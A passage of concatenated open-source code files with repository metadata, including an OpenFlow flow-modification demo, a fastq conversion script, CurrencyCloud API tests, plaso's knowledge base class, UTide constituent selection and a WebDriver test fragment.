flow_entry1.set_flow_priority(priority)
flow_entry1.set_flow_hard_timeout(0)
flow_entry1.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = SetNwSrcAction(action_order)
action.set_nw_src(act_mod_ipv4_src_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetNwDstAction(action_order)
action.set_nw_dst(act_mod_ipv4_dst_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetTpSrcAction(action_order)
action.set_tp_src(act_mod_tcp_src_port)
instruction.add_apply_action(action)
action_order += 1
action = SetTpDstAction(action_order)
action.set_tp_dst(act_mod_tcp_dst_port)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry1.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_ip_proto(match_ip_proto)
match.set_ipv4_src(match_ipv4_src_addr)
match.set_ipv4_dst(match_ipv4_dst_addr)
match.set_tcp_dst(match_tcp_dst_port)
flow_entry1.add_match(match)
print ("\n")
print ("<<< Flow to send:")
print flow_entry1.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry1)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
# ---------------------------------------------------
# Second flow entry
# ---------------------------------------------------
table_id = 0
flow_id += 1
flow_name = "Modify IP packet example2"
priority = 900
cookie = 1300
match_in_port = 110
match_eth_type = ETH_TYPE_IPv4
match_ip_proto = IP_PROTO_UDP
match_ipv4_src_addr = "10.1.0.0/16"
match_ipv4_dst_addr = "168.1.1.101/32"
match_udp_dst_port = 1812
act_mod_ipv4_src_addr = "172.101.1.9/32"
act_mod_ipv4_dst_addr = "172.101.1.1/32"
act_mod_udp_src_port = 5555
act_mod_udp_dst_port = 7777
act_out_port = 120
print "\n"
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" IP Protocol (%s)\n"
" IPv4 Source Address (%s)\n"
" IPv4 Destination Address (%s)\n"
" UDP Destination Port (%s)" %
(match_in_port,
hex(match_eth_type),
match_ip_proto,
match_ipv4_src_addr,
match_ipv4_dst_addr,
match_udp_dst_port))
print (" Actions: Set Field (IPv4 Source Address %s)\n"
" Set Field (IPv4 Destination Address %s)\n"
" Set Field (UDP Source Port %s)\n"
" Set Field (UDP Destination Port %s)\n"
" Output (%s)" %
(act_mod_ipv4_src_addr,
act_mod_ipv4_dst_addr,
act_mod_udp_src_port,
act_mod_udp_dst_port,
act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry2 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry2.set_flow_table_id(table_id)
flow_entry2.set_flow_name(flow_name)
flow_entry2.set_flow_id(flow_id)
flow_entry2.set_flow_cookie(cookie)
flow_entry2.set_flow_priority(priority)
flow_entry2.set_flow_hard_timeout(0)
flow_entry2.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = SetFieldAction(action_order)
action.set_ipv4_src(act_mod_ipv4_src_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetFieldAction(action_order)
action.set_ipv4_dst(act_mod_ipv4_dst_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetFieldAction(action_order)
action.set_udp_src(act_mod_udp_src_port)
instruction.add_apply_action(action)
action_order += 1
action = SetFieldAction(action_order)
action.set_udp_dst(act_mod_udp_dst_port)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry2.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_ip_proto(match_ip_proto)
match.set_ipv4_src(match_ipv4_src_addr)
match.set_ipv4_dst(match_ipv4_dst_addr)
match.set_udp_dst(match_udp_dst_port)
flow_entry2.add_match(match)
print ("\n")
print ("<<< Flow to send:")
print flow_entry2.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry2)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
print ("\n")
print ("<<< Delete flows from the Controller's cache "
"and from the table '%s' on the '%s' node" % (table_id, nodeName))
time.sleep(rundelay)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
print ("\n")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
of_demo_40()
| jebpublic/pybvc | samples/sampleopenflow/demos/demo40.py | Python | bsd-3-clause | 11,998 |
#!/usr/bin/env python
"""Convert fastq to fasta
Usage:
python fastq_to_fastq.py inputfile outputfile proportion
Where:
inputfile is a fastq or fastq.gz file
outputfile is a fastq or fastq.gz file to output to
proportion is the proportion of converted Ts
"""
# Modules
import sys
import gzip
import random
from Bio import SeqIO
try:
infile = sys.argv[1]
outfile = sys.argv[2]
proportion = float(sys.argv[3])
except:
print __doc__
sys.exit(1)
# Functions
def myopen(_file, mode="r"):
if _file.endswith(".gz"):
return gzip.open(_file, mode=mode)
else:
return open(_file, mode=mode)
# Main
sequences = (s for s in (SeqIO.parse(myopen(infile), "fastq")))
with myopen(outfile, "w") as outf:
for s in sequences:
fastq = s.format("fastq").strip().split("\n")
converted = list(fastq[1])
end = len(converted)
if "".join(converted[-3:]) == "CCG":
end = len(converted) - 3
for i in xrange(3, end):
if converted[i] == "T" and proportion > random.random():
converted[i] = "C"
fastq[1] = "".join(converted)
outf.write("\n".join(fastq) + "\n")
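# Worked example of the loop above (illustrative, assuming proportion=1.0):
# for the read "ATTTTTTCCG" the first three bases are never touched, the
# trailing "CCG" is protected by the end-trimming check, and the remaining
# Ts (positions 3-6) are rewritten to Cs:
#
#   "ATTTTTTCCG"  ->  "ATTCCCCCCG"
#
# With 0 < proportion < 1, each eligible T is converted independently with
# that probability.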
| wkh124/wkh124 | fastq_rrbs_convert.py | Python | gpl-3.0 | 1,200 |
# coding:utf-8
'''
created on 2018/2/24
@author:sunyihuan
'''
import tensorflow as tf
import os
from tensorflow.python.tools import inspect_checkpoint as chkp
logdir = '/Users/sunyihuan/Desktop/孙义环/mnist-model/mnist_data'
# chkp.print_tensors_in_checkpoint_file(logdir+'/model_epoch_0008_step_3860',tensor_name='PrimaryCaps_layer/Conv/weights',all_tensors=False)
tt = os.listdir(logdir)
with tf.Session() as sess:
# saver = tf.train.Saver()
print(tf.train.latest_checkpoint(logdir))
saver = tf.train.import_meta_graph(logdir+'/model_epoch_0008_step_3860.meta')
saver.restore(sess,logdir+'/model_epoch_0008_step_3860')
graph = tf.get_default_graph()
print(graph.get_operations())
for g in graph.get_operations():
print(g.name)
    # tf.import_graph_def() cannot be called without a GraphDef argument;
    # print the restored graph's definition instead.
    print(graph.as_graph_def())
| sunyihuan326/DeltaLab | mnist/model.py | Python | mit | 803 |
from betamax import Betamax
import sys
from currencycloud import Client, Config
from currencycloud.resources import *
def is_string(s):
if sys.version_info[0] < 3:
return isinstance(s, basestring)
else:
return isinstance(s, str)
class TestActions:
beneficiary_id = None
beneficiary_first_id = None
beneficiary_params = {
'beneficiary_entity_type': 'individual',
'beneficiary_first_name': 'Dr.',
'beneficiary_last_name': 'Who',
'beneficiary_address': ['Address 42'],
'beneficiary_city': 'The Citadel',
'beneficiary_postcode': '42424',
'beneficiary_country': 'GB',
'bank_account_holder_name': 'Test User',
'bank_country': 'GB',
'currency': 'GBP',
'name': 'Test User Nick',
'account_number': '41854372',
'routing_code_type_1': 'aba',
'routing_code_value_1': '123456780',
'routing_code_type_2': 'sort_code',
'routing_code_value_2': '400730',
'payment_types': ['priority', 'regular']
}
def setup_method(self, method):
# TODO: To run against real server please delete ../fixtures/vcr_cassettes/* and replace
# login_id and api_key with valid credentials before running the tests
login_id = '[email protected]'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
environment = Config.ENV_DEMO
self.client = Client(login_id, api_key, environment)
def test_actions_can_create(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_create')
beneficiary = self.client.beneficiaries.create(**TestActions.beneficiary_params)
TestActions.beneficiary_id = beneficiary.id
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id
assert beneficiary.created_at
assert beneficiary.updated_at
assert beneficiary.created_at == beneficiary.updated_at
for k, v in TestActions.beneficiary_params.items():
if k in ('routing_code_type_1', 'routing_code_value_1'):
# skip fields with wrong values that are cleaned up by the
# API
continue
b = beneficiary[k]
if is_string(v):
b = str(b)
v = str(v)
assert b == v
def test_actions_can_retrieve(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_retrieve')
beneficiary = self.client.beneficiaries.retrieve(TestActions.beneficiary_id)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_id
def test_actions_can_find(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_find')
beneficiaries = self.client.beneficiaries.find(
bank_account_holder_name=TestActions.beneficiary_params['bank_account_holder_name']) # noqa
assert beneficiaries
assert len(beneficiaries) >= 1
TestActions.beneficiary_first_id = beneficiaries[0].id
for beneficiary in beneficiaries:
assert isinstance(beneficiary, Beneficiary)
pagination = beneficiaries.pagination
assert pagination.total_entries > 0
assert pagination.current_page == 1
assert pagination.per_page == 25
assert pagination.previous_page == -1
assert pagination.order == 'created_at'
assert pagination.order_asc_desc == 'asc'
def test_actions_can_first(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_first')
beneficiary = self.client.beneficiaries.first(
bank_account_holder_name=TestActions.beneficiary_params['bank_account_holder_name']) # noqa
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_first_id
assert beneficiary.bank_account_holder_name == TestActions.beneficiary_params[ # noqa
'bank_account_holder_name']
def test_actions_can_update(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_update')
beneficiary = self.client.beneficiaries.update(
TestActions.beneficiary_id,
bank_account_holder_name="Test Name 2"
)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_id
assert beneficiary.bank_account_holder_name == "Test Name 2"
def test_actions_can_delete(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_delete')
beneficiary = self.client.beneficiaries.delete(TestActions.beneficiary_id)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id == TestActions.beneficiary_id
assert beneficiary.bank_account_holder_name == "Test Name 2"
def test_actions_can_current(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_current')
account = self.client.accounts.current()
assert isinstance(account, Account)
assert account.id == '8ec3a69b-02d1-4f09-9a6b-6bd54a61b3a8'
assert account.created_at == '2015-04-24T15:57:55+00:00'
def test_actions_can_validate_beneficiaries(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_validate_beneficiaries')
params = {
'bank_country': 'GB',
'currency': 'GBP',
'account_number': TestActions.beneficiary_params['account_number'], # noqa
'routing_code_type_1': TestActions.beneficiary_params['routing_code_type_2'], # noqa
'routing_code_value_1': TestActions.beneficiary_params['routing_code_value_2'], # noqa
'payment_types': ['regular']}
beneficiary = self.client.beneficiaries.validate(**params)
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.account_number == TestActions.beneficiary_params[ # noqa
'account_number']
assert 'regular' in beneficiary.payment_types
def test_actions_can_use_currency_to_retrieve_balance(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette(
'actions/can_use_currency_to_retrieve_balance')
balance = self.client.balances.for_currency('GBP')
assert isinstance(balance, Balance)
assert balance.id
| CurrencyCloud/currencycloud-python | tests/integration/test_actions.py | Python | mit | 7,051 |
# -*- coding: utf-8 -*-
"""The artifact knowledge base object.
The knowledge base is filled by user provided input and the pre-processing
phase. It is intended to provide successive phases, like the parsing and
analysis phases, with essential information like the timezone and codepage
of the source data.
"""
from __future__ import unicode_literals
import codecs
import os
from plaso.containers import artifacts
from plaso.engine import logger
import pytz # pylint: disable=wrong-import-order
class KnowledgeBase(object):
"""The knowledge base."""
_DEFAULT_ACTIVE_SESSION = '00000000000000000000000000000000'
def __init__(self):
"""Initializes a knowledge base."""
super(KnowledgeBase, self).__init__()
self._active_session = self._DEFAULT_ACTIVE_SESSION
self._available_time_zones = {}
self._codepage = 'cp1252'
self._environment_variables = {}
self._hostnames = {}
self._mount_path = None
self._text_prepend = None
self._time_zone = pytz.UTC
self._user_accounts = {}
self._values = {}
@property
def available_time_zones(self):
"""list[TimeZone]: available time zones of the current session."""
return self._available_time_zones.get(self._active_session, {}).values()
@property
def codepage(self):
"""str: codepage of the current session."""
return self.GetValue('codepage', default_value=self._codepage)
@property
def hostname(self):
"""str: hostname of the current session."""
hostname_artifact = self._hostnames.get(self._active_session, None)
if not hostname_artifact:
return ''
return hostname_artifact.name or ''
@property
def timezone(self):
"""datetime.tzinfo: timezone of the current session."""
return self._time_zone
@property
def user_accounts(self):
"""list[UserAccountArtifact]: user accounts of the current session."""
return self._user_accounts.get(self._active_session, {}).values()
@property
def year(self):
"""int: year of the current session."""
return self.GetValue('year', default_value=0)
def AddAvailableTimeZone(self, time_zone, session_identifier=None):
"""Adds an available time zone.
Args:
time_zone (TimeZoneArtifact): time zone artifact.
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
Raises:
KeyError: if the time zone already exists.
"""
session_identifier = session_identifier or self._active_session
if session_identifier not in self._available_time_zones:
self._available_time_zones[session_identifier] = {}
available_time_zones = self._available_time_zones[session_identifier]
if time_zone.name in available_time_zones:
raise KeyError('Time zone: {0:s} already exists.'.format(time_zone.name))
available_time_zones[time_zone.name] = time_zone
def AddUserAccount(self, user_account, session_identifier=None):
"""Adds an user account.
Args:
user_account (UserAccountArtifact): user account artifact.
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
Raises:
KeyError: if the user account already exists.
"""
session_identifier = session_identifier or self._active_session
if session_identifier not in self._user_accounts:
self._user_accounts[session_identifier] = {}
user_accounts = self._user_accounts[session_identifier]
if user_account.identifier in user_accounts:
raise KeyError('User account: {0:s} already exists.'.format(
user_account.identifier))
user_accounts[user_account.identifier] = user_account
def AddEnvironmentVariable(self, environment_variable):
"""Adds an environment variable.
Args:
environment_variable (EnvironmentVariableArtifact): environment variable
artifact.
Raises:
KeyError: if the environment variable already exists.
"""
name = environment_variable.name.upper()
if name in self._environment_variables:
raise KeyError('Environment variable: {0:s} already exists.'.format(
environment_variable.name))
self._environment_variables[name] = environment_variable
def GetEnvironmentVariable(self, name):
"""Retrieves an environment variable.
Args:
name (str): name of the environment variable.
Returns:
EnvironmentVariableArtifact: environment variable artifact or None
if there was no value set for the given name.
"""
name = name.upper()
return self._environment_variables.get(name, None)
def GetEnvironmentVariables(self):
"""Retrieves the environment variables.
Returns:
list[EnvironmentVariableArtifact]: environment variable artifacts.
"""
return self._environment_variables.values()
def GetHostname(self, session_identifier=None):
"""Retrieves the hostname related to the event.
If the hostname is not stored in the event it is determined based
on the preprocessing information that is stored inside the storage file.
Args:
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
Returns:
str: hostname.
"""
session_identifier = session_identifier or self._active_session
hostname_artifact = self._hostnames.get(session_identifier, None)
if not hostname_artifact:
return ''
return hostname_artifact.name or ''
def GetMountPath(self):
"""Retrieves the mount path of the source.
Returns:
str: mount path of the source or None if not set.
"""
return self._mount_path
def GetSourceConfigurationArtifacts(self, session_identifier=None):
"""Retrieves the knowledge base as a source configuration artifacts.
Args:
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
Returns:
list[SourceConfigurationArtifact]: source configuration artifacts.
"""
source_configuration = artifacts.SourceConfigurationArtifact()
# TODO: set path_spec
source_configuration.system_configuration = (
self._GetSystemConfigurationArtifact(
session_identifier=session_identifier))
return [source_configuration]
def _GetSystemConfigurationArtifact(self, session_identifier=None):
"""Retrieves the knowledge base as a system configuration artifact.
Args:
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
Returns:
SystemConfigurationArtifact: system configuration artifact.
"""
session_identifier = session_identifier or self._active_session
system_configuration = artifacts.SystemConfigurationArtifact()
system_configuration.code_page = self.GetValue(
'codepage', default_value=self._codepage)
system_configuration.hostname = self._hostnames.get(
session_identifier, None)
system_configuration.keyboard_layout = self.GetValue('keyboard_layout')
system_configuration.operating_system = self.GetValue('operating_system')
system_configuration.operating_system_product = self.GetValue(
'operating_system_product')
system_configuration.operating_system_version = self.GetValue(
'operating_system_version')
time_zone = self._time_zone.zone
if isinstance(time_zone, bytes):
time_zone = time_zone.decode('ascii')
system_configuration.time_zone = time_zone
available_time_zones = self._available_time_zones.get(
session_identifier, {})
# In Python 3 dict.values() returns a type dict_values, which will cause
# the JSON serializer to raise a TypeError.
system_configuration.available_time_zones = list(
available_time_zones.values())
user_accounts = self._user_accounts.get(session_identifier, {})
# In Python 3 dict.values() returns a type dict_values, which will cause
# the JSON serializer to raise a TypeError.
system_configuration.user_accounts = list(user_accounts.values())
return system_configuration
def GetTextPrepend(self):
"""Retrieves the text to prepend to the display name.
Returns:
str: text to prepend to the display name or None if not set.
"""
return self._text_prepend
def GetUsernameByIdentifier(
self, user_identifier, session_identifier=None):
"""Retrieves the username based on an user identifier.
Args:
user_identifier (str): user identifier, either a UID or SID.
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
Returns:
str: username.
"""
session_identifier = session_identifier or self._active_session
user_accounts = self._user_accounts.get(session_identifier, {})
user_account = user_accounts.get(user_identifier, None)
if not user_account:
return ''
return user_account.username or ''
def GetUsernameForPath(self, path):
"""Retrieves a username for a specific path.
This is determining if a specific path is within a user's directory and
returning the username of the user if so.
Args:
path (str): path.
Returns:
str: username or None if the path does not appear to be within a user's
directory.
"""
path = path.lower()
user_accounts = self._user_accounts.get(self._active_session, {})
for user_account in user_accounts.values():
if not user_account.user_directory:
continue
user_directory = user_account.user_directory.lower()
if path.startswith(user_directory):
return user_account.username
return None
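  # Illustrative sketch (not part of the original class): with a registered
  # user account whose user_directory is '/Users/alice', a call such as
  # GetUsernameForPath('/Users/Alice/Library/Logs/foo.log') matches the
  # directory case-insensitively and returns 'alice'; a path outside every
  # known user directory returns None.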
def GetValue(self, identifier, default_value=None):
"""Retrieves a value by identifier.
Args:
identifier (str): case insensitive unique identifier for the value.
default_value (object): default value.
Returns:
object: value or default value if not available.
Raises:
TypeError: if the identifier is not a string type.
"""
if not isinstance(identifier, str):
raise TypeError('Identifier not a string type.')
identifier = identifier.lower()
return self._values.get(identifier, default_value)
def HasUserAccounts(self):
"""Determines if the knowledge base contains user accounts.
Returns:
bool: True if the knowledge base contains user accounts.
"""
return self._user_accounts.get(self._active_session, {}) != {}
def ReadSystemConfigurationArtifact(
self, system_configuration, session_identifier=None):
"""Reads the knowledge base values from a system configuration artifact.
Note that this overwrites existing values in the knowledge base.
Args:
system_configuration (SystemConfigurationArtifact): system configuration
artifact.
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
"""
session_identifier = session_identifier or self._active_session
if system_configuration.code_page:
try:
self.SetCodepage(system_configuration.code_page)
except ValueError:
logger.warning(
'Unsupported codepage: {0:s}, defaulting to {1:s}'.format(
system_configuration.code_page, self._codepage))
self._hostnames[session_identifier] = system_configuration.hostname
self.SetValue('keyboard_layout', system_configuration.keyboard_layout)
self.SetValue('operating_system', system_configuration.operating_system)
self.SetValue(
'operating_system_product',
system_configuration.operating_system_product)
self.SetValue(
'operating_system_version',
system_configuration.operating_system_version)
if system_configuration.time_zone:
try:
self.SetTimeZone(system_configuration.time_zone)
except ValueError:
logger.warning(
'Unsupported time zone: {0:s}, defaulting to {1:s}'.format(
system_configuration.time_zone, self.timezone.zone))
self._available_time_zones[session_identifier] = {
time_zone.name: time_zone
for time_zone in system_configuration.available_time_zones}
self._user_accounts[session_identifier] = {
user_account.identifier: user_account
for user_account in system_configuration.user_accounts}
def SetActiveSession(self, session_identifier):
"""Sets the active session.
Args:
session_identifier (str): session identifier where None represents
the default active session.
"""
self._active_session = session_identifier or self._DEFAULT_ACTIVE_SESSION
def SetCodepage(self, codepage):
"""Sets the codepage.
Args:
codepage (str): codepage.
Raises:
ValueError: if the codepage is not supported.
"""
try:
codecs.getencoder(codepage)
self._codepage = codepage
except LookupError:
raise ValueError('Unsupported codepage: {0:s}'.format(codepage))
def SetEnvironmentVariable(self, environment_variable):
"""Sets an environment variable.
Args:
environment_variable (EnvironmentVariableArtifact): environment variable
artifact.
"""
name = environment_variable.name.upper()
self._environment_variables[name] = environment_variable
def SetHostname(self, hostname, session_identifier=None):
"""Sets a hostname.
Args:
hostname (HostnameArtifact): hostname artifact.
      session_identifier (Optional[str]): session identifier, where
None represents the active session.
"""
session_identifier = session_identifier or self._active_session
self._hostnames[session_identifier] = hostname
def SetMountPath(self, mount_path):
"""Sets the text to prepend to the display name.
Args:
mount_path (str): mount path of the source or None if the source is
not a mounted onto a directory.
"""
# Remove a trailing path separator from the mount path so the relative
# paths will start with a path separator.
if mount_path and mount_path.endswith(os.sep):
mount_path = mount_path[:-1]
self._mount_path = mount_path
def SetTextPrepend(self, text_prepend):
"""Sets the text to prepend to the display name.
Args:
text_prepend (str): text to prepend to the display name or None if no
text should be prepended.
"""
self._text_prepend = text_prepend
def SetTimeZone(self, time_zone):
"""Sets the time zone.
Args:
time_zone (str): time zone.
Raises:
ValueError: if the timezone is not supported.
"""
try:
self._time_zone = pytz.timezone(time_zone)
except (AttributeError, pytz.UnknownTimeZoneError):
raise ValueError('Unsupported timezone: {0!s}'.format(time_zone))
def SetValue(self, identifier, value):
"""Sets a value by identifier.
Args:
identifier (str): case insensitive unique identifier for the value.
value (object): value.
Raises:
TypeError: if the identifier is not a string type.
"""
if not isinstance(identifier, str):
raise TypeError('Identifier not a string type.')
identifier = identifier.lower()
self._values[identifier] = value
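# Minimal usage sketch (illustrative; not part of the original module):
#
#   knowledge_base = KnowledgeBase()
#   knowledge_base.SetValue('operating_system', 'Windows')
#   knowledge_base.GetValue('OPERATING_SYSTEM')   # identifiers are
#                                                 # case insensitive
#   knowledge_base.SetTimeZone('Europe/Amsterdam')
#   knowledge_base.timezone.zone                  # 'Europe/Amsterdam'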
| rgayon/plaso | plaso/engine/knowledge_base.py | Python | apache-2.0 | 15,317 |
import sys
sys.path.append("yam")
sys.path.append("../../yam")
import config, clientapp, threading
import time
from devices import DevicePresenceBroadcaster, Device
from player import LocalPlayer, RemotePlayer
class TestClientApp:
config.setConfigFolder('tests/config/')
clientReceivedBroadcastMsg = False
device = Device(type="remote",visibleName="test-device")
app = None
def test_app_can_watch_devices(self):
global app
app = clientapp.setupTestClient()
app.deviceMan.deleteRegistry()
t = threading.Thread(target=self.send_presence_broadcast_to_device)
t.start()
app.start()
time.sleep(2)
assert self.device in app.deviceMan.getDevices()
app.deviceMan.deleteRegistry()
def send_presence_broadcast_to_device(self):
broadcaster = DevicePresenceBroadcaster(self.device, delayBetweenBroadcastsInSec=1)
broadcaster.start()
time.sleep(5)
broadcaster.stop()
global app
app.stop()
def test_app_can_select_device(self):
global app
app.deviceMan.deleteRegistry()
app.deviceMan.registerLocalDevice()
app.updatePlayer()
assert isinstance(app.player , LocalPlayer)
app.deviceMan.deleteRegistry()
device = Device(type="remote",visibleName="test-client-app", url="localhost:0")
app.deviceMan.registerDevice(device)
app.deviceMan.setActiveDevice(device)
app.updatePlayer()
assert isinstance(app.player, RemotePlayer)
app.stop()
app.deviceMan.deleteRegistry()
def test_app_can_send_request_to_remote_device(self):
global app
def test_app_does_not_leak(self):
pass
| Aleksandre/YAM | tests/unit/test_clientapp.py | Python | mit | 1,536 |
from collections import OrderedDict
import numpy as np
from ._ut_constants import constit_index_dict, ut_constants
from .astronomy import ut_astron
from .utilities import Bunch
def ut_cnstitsel(tref, minres, incnstit, infer):
"""
Select constituents and organize constituent data.
inputs
tref = reference time (UTC, days relative to Python datetime epoch)
minres = freq separation (cph) used in decision tree
incnstit = 'cnstit' input to ut_solv
infer = 'opt.infer' input to ut_solv
outputs
cnstit.NR.name = list of 4-char names of NR constits
cnstit.NR.frq = frequencies (cph) of NR constits
cnstit.NR.lind = list indices (in ut_constants.mat) of NR constits
cnstit.R = empty if no inference; otherwise, for each (i'th) R constit:
cnstit.R[i].name, .frq, .lind = as above, but for R constits
cnstit.R[i].I[j].name, .frq, .lind = as above for j'th I constit
coef.nNR, coef.nR, coef.nI = number non-reference, reference,
inferred constituents
coef.name = list of names of all constituents (NR, R, and I)
coef.aux.frq = frequencies (cph) of all constituents
coef.aux.lind = list indices of all constituents
coef.aux.reftime = tref
"""
shallow = ut_constants.shallow
const = ut_constants.const
cnstit = Bunch()
coef = Bunch()
astro, ader = ut_astron(tref)
ii = np.isfinite(const.ishallow)
const.freq[~ii] = np.dot(const.doodson[~ii, :], ader[:, 0]) / 24
for k in ii.nonzero()[0]:
ik = const.ishallow[k] + np.arange(const.nshallow[k])
ik = ik.astype(int) - 1
const.freq[k] = np.sum(const.freq[shallow.iname[ik] - 1] * shallow.coef[ik])
# cnstit.NR
cnstit["NR"] = Bunch()
# if incnstit.lower() == 'auto':
if incnstit == "auto":
cnstit.NR.lind = np.where(const.df >= minres)[0]
else:
cnstit.NR.lind = [constit_index_dict[n] for n in incnstit]
# Remove from NR any R and I constituents.
if infer is not None:
RIset = set(infer.inferred_names) | set(infer.reference_names)
RI_index_set = {constit_index_dict[n] for n in RIset}
cnstit.NR.lind = [ind for ind in cnstit.NR.lind if ind not in RI_index_set]
cnstit.NR.frq = const.freq[cnstit.NR.lind]
cnstit.NR.name = const.name[cnstit.NR.lind]
nNR = len(cnstit.NR.frq)
# cnstit.R
nR = 0
nI = 0
cnstit.R = []
if infer is not None:
nI = len(infer.inferred_names)
# Find unique reference names
_r = infer.reference_names
allrefs = list(OrderedDict(zip(_r, [1] * len(_r))).keys())
nR = len(allrefs)
for k, name in enumerate(allrefs):
refstruct = Bunch(name=name)
refstruct.lind = constit_index_dict[name]
refstruct.frq = const.freq[refstruct.lind]
ind = [i for i, rname in enumerate(infer.reference_names) if name == rname]
refstruct.nI = len(ind)
refstruct.I = Bunch(Rp=[], Rm=[], name=[], lind=[], frq=[]) # noqa
for lk, ilk in enumerate(ind):
refstruct.I.Rp.append(
infer.amp_ratios[ilk]
* np.exp(1j * infer.phase_offsets[ilk] * np.pi / 180),
)
if len(infer.amp_ratios) > nI:
refstruct.I.Rm.append(
infer.amp_ratios[ilk + nI]
* np.exp(-1j * infer.phase_offsets[ilk + nI] * np.pi / 180),
)
else:
refstruct.I.Rm.append(np.conj(refstruct.I.Rp[lk]))
iname = infer.inferred_names[ilk]
refstruct.I.name.append(iname)
lind = constit_index_dict[iname]
refstruct.I.lind.append(lind)
refstruct.I.frq.append(const.freq[lind])
refstruct.I.Rp = np.array(refstruct.I.Rp)
refstruct.I.Rm = np.array(refstruct.I.Rm)
cnstit.R.append(refstruct)
coef.name = list(cnstit.NR.name[:])
coef.aux = Bunch(
frq=list(cnstit.NR.frq[:]),
lind=list(cnstit.NR.lind[:]),
reftime=tref,
)
if infer is not None:
# Append reference values, and then inferred values, to the lists.
coef.name.extend(allrefs)
coef.aux.frq.extend([_ref.frq for _ref in cnstit.R])
coef.aux.lind.extend([_ref.lind for _ref in cnstit.R])
for ref in cnstit.R:
coef.name.extend(ref.I.name)
coef.aux.frq.extend(ref.I.frq)
coef.aux.lind.extend(ref.I.lind)
coef.name = np.array(coef.name, dtype=object)
coef.aux.frq = np.array(coef.aux.frq, dtype=float)
coef.aux.lind = np.array(coef.aux.lind, dtype=int)
coef.nR = nR
coef.nNR = nNR
coef.nI = nI
return cnstit, coef
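# Illustrative call (a sketch; the reference time and resolution are made-up
# values, not defaults): select constituents automatically, with no inference,
# for a record whose frequency-resolution threshold is one cycle per 30 days:
#
#   cnstit, coef = ut_cnstitsel(
#       tref=735000.0,            # days relative to the Python datetime epoch
#       minres=1.0 / (24 * 30),   # freq separation threshold in cph
#       incnstit='auto',
#       infer=None,
#   )
#   coef.name, coef.aux.frq      # selected constituent names and frequencies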
| wesleybowman/UTide | utide/constituent_selection.py | Python | mit | 4,849 |
# META: timeout=long
import pytest
from tests.support.asserts import assert_error, assert_success, assert_dialog_handled
from tests.support.inline import inline
def get_element_property(session, element_id, name):
return session.transport.send(
"GET", "session/{session_id}/element/{element_id}/property/{name}".format(
session_id=session.session_id, element_id=element_id, name=name))
@pytest.fixture
def check_user_prompt_closed_without_exception(session, create_dialog):
def check_user_prompt_closed_without_exception(dialog_type, retval):
session.url = inline("<input id=foo>")
element = session.find.css("#foo", all=False)
create_dialog(dialog_type, text=dialog_type)
response = get_element_property(session, element.id, "id")
assert_success(response, "foo")
assert_dialog_handled(session, expected_text=dialog_type, expected_retval=retval)
return check_user_prompt_closed_without_exception
@pytest.fixture
def check_user_prompt_closed_with_exception(session, create_dialog):
def check_user_prompt_closed_with_exception(dialog_type, retval):
session.url = inline("<input id=foo>")
element = session.find.css("#foo", all=False)
create_dialog(dialog_type, text=dialog_type)
response = get_element_property(session, element.id, "id")
